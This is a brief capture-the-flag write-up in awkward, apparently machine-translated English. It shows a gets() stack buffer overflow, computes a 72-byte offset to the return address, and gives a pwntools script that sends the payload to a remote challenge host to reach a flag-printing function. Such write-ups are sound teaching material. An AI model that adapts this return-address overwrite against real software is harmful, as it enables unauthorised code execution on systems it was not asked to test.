nc about the address and port number to the
Look at the source file
See the familiar gets () function, this function is usually most probably see a buffer overflow vulnerability, the program can be seen as v5 40H opened up storage space, so the input is longer than 40H can cause overflow, look at sprint ( )function
Can see that this function is to obtain flag key point, the program will print out the position of this function, namely 0x40060d, almost clear ideas here, and we need to control the overflow location, the return address to the address of this function, we currently return value located RBP + 8 function, so the overflow point may be calculated by: 40H + 8H = 48H = 72
exp:
#!/usr/bin/env python # coding=utf-8 from pwn import * context(arch = 'amd64', os = 'linux') sh = remote('111.198.29.45',56844) target = 0x40060d sh.sendline('A' * 72 + p64(target)) sh.interactive()
Hi mention flag.